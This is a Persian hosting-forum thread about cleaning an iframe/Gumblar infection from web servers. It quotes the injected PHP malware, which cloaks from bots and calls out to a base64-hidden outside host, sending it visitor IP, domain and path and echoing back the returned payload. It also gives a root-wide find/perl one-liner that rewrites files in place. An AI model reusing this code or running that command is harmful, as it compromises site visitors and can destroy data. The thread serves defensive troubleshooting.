نمایش نسخه قابل چاپ
با سلام
آیا کسی با ویروس iferem آشنایی داره و تجریه همچین ویروسی را روی سرورش داشته؟
و راهی برای remove کردن این ویروس را تجربه کرده است؟
قابل ذکر است که انواع آنتی ویروس ها تست شده همچنین ترانسفر هم شد اما باز ویروس از بین نرفت.
اگر کسی تجربش رو داره ممنون میشم اطلاعات بده و راهنمای کنه.
ممنون
سلام
من توی چند تا DB سایتهای Antivirus جستجو کردم ولی چنین virus پیدا نکردم . لطفا اسم کامل send بشه
و اینکه شما اگه از CXS استفاده کنید 99% پاک میکنه ولی FREE نیست
این ویروسش معروفه و نامش iFrame virus هست.
میاد تو فایلها مخصوصا فایلهای php یک کد iframe میذاره که سورسش ویروسیه.
بعد از مدتی گوگل و فایرفاکس کل سایتهای سرور شما رو ویروسی اخطار میدن.
اگه بتونیم اینجا واسش راهی پیدا کنیم بدرد خیلیا میخوره.
سلام
همون CXS میتونه این کار رو انجام بده ( محصول configserver.com )
و لینک پایین رو هم یه چک کنید
SOSWebScan Iframe Badware,Virus,Malware removal utility
سلام
من هم با اینگونه ویروس برخوردم که به این شکل است pe362f3384519b.php وقتی کپی میشه تو هاست عملکرد کل هاست را مخطل میکنه.
راهی وجود داره که از بین ببریم چنین ویروسی را ؟؟
نمونه هم ضمیمه کردم
سلام
register_globals off
allow_url_fopen off
disable_functions = system,exec
mod_security نصب کنید و تنضیمات رو انجام بدید(rules)
FTP anonymouse رو غیرفعال کنید
اسم ویروس گامبلار هست که توسط انتی ویروس آواست براحتی قابل شناسایی هست
این ویروس از طریق اف تی پی به هاست و فایل های سرایت می کنه
تنها راهش اینه فایل های آلوده رو حذف کنید و مجددا فایل سالم آپلود کنید و پرمیشن فایل های Config.php و فایلهای با پسوند js. رو 444 قرار بدید و پسورد اف تی پی رو هم یک پسورد پیچیده و سخت بذارید و همینطور کامپیوتر خودتون رو با آنتی ویروس Avast پاکسازی کنید.
در ضمن این ویروس منبع اصلیش از طریق قرار دادن لینک باکس های iframe میباشد.مثل همین اکسینادز و ... بیشتر این جور سرویس دهنده ها کدهاشون آلوده هستند و باعث میشه همه جا سرایت کنه..من خودم چند بار به همین درد مبتلا شدم. اما وقتی این کد تبلیغاتی رو از سایتم پاک کردم چند روز بعد از لیست آلوده های گوگل بیرون آمدم. تنها راهش هم اینه که فایلهای آلوده سایت رو کلا نابود کنید و برای پیشگیری به کاربراتون بگید از گزاشتن کدهای تبلیغاتی ifram در سایت جلوگیری کنند.. این کار رو حتی بلاگفا هم کرده و گزاشتن کدهای تبلیغاتی رو تو وبلاگها ممنوع کرده
اگه مشکل روی تعداد زیادی از فایلها هست که قبلا گفتم CXS رو install کنید
ولی اگه خودتون دوست دارید دستی این کار رو انجام بدید :
میتونید توی فایلتون iframe Tag رو زیر Body و یا Head Tag پاک کنید و بعدش هم permission فایل رو set کنید که دوباره این اتفاق نیفته
فرمایشات شما کاملا متین ولی روش های بالا تست شد...
avast یکی از بهترین هاست و تقریبا" 4 سالی است که استفاده می کنم و راضی هستم
اما برای حل این مشکل در سرور کافیست که دستور زیر را در ssh اجرا کنید تا کامل این کد از سایت های آلوده پاک شود :
find / -type f -mtime -10 | xargs grep -l '<iframe'| xargs perl -pi -e 's/^.*\<iframe.*$/ /g'
به جای <iframe میبایست کدی که iframe به سایت آلوده اضافه می کند را وارد کنید.
البته تا 1 ساعت بعد از اجرای دستور صبر کنید تا جستجو انجام بشه و کد پاک بشود.
این دستور ابتدا کد را پیدا کرده در مرحله بعد پاک کرده و به جای کد iframe یک space قرار می دهد.
موفق باشید.
در کدوم قسمت کامندتون باید کد رو قرار بدند ، آیفرم اولی یا دومی ؟نقل قول:
نوشته اصلی توسط webmizban
سلام
متاسقانه سایت منم همین ویروس رو گرفته البته امروز گرفت وقتی آبدیت کردم
همه کد ها رو تست کردن هیچی اضافه نشده
سایت هم Html هستش
من فقط 2 تا فایل رو ادیت کردم ولی الان همه صفخات ایت جوری شده
برای من فقط یه کد تبلیغاتی هستش که به سایت دیگه رو باز میکنه
راهی نداره ؟
واقعا کسی نمیتونه برای این malware راه حلی ارائه بده؟
این همه مهندس داریم فقط میگن هاستو حذف کن از دوباره بریز. خوب اینم که خودمون بلدیم.
شما و همه دوستان توجه کنید وقتی ویندوز نصب کردین همون اول کار kasperski internet security2013 نصب کنید امنیت سیتم تضمین میکنه چون قدرتش خیلی بالا از cloud protection استفاده میکنهنقل قول:
نوشته اصلی توسط maya2010
منم همین مشکل رو امشب تو سایتم دیدم اینم آی فرم که درستش کرده بود / این کد رو تو صفحه ایندکس قالب حذف کردم درست شد
اگه نمی تونی درستش کنی پی ام بده خودم واست حلش میکنمکد:<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
دوستانی که iframe رو حذف میکنن و بعدش میگن درست شد توجه کنن همون صفحه بازم تا یکی دو هفته دیگه مجدد iframe میگیره.
من یه راه حل خود دارم:
1 - آنتی emisoft anti malware یا کسپر 2013 اول رو سیستموتون نصب کنید و اسکن کنید و همه تروجانها رو حذف کنید. (emisoft anti malware تخصصش شناسایی و حذف malware و تروجانه)
2 - به سایتتون رفته ویروس iframe رو از سایت حذف کرده و سطح دسترسی فایل های htm , html و java رو 444 بکنید.
دوستان اگه راه سریعتری دارن پیشنهاد بدن.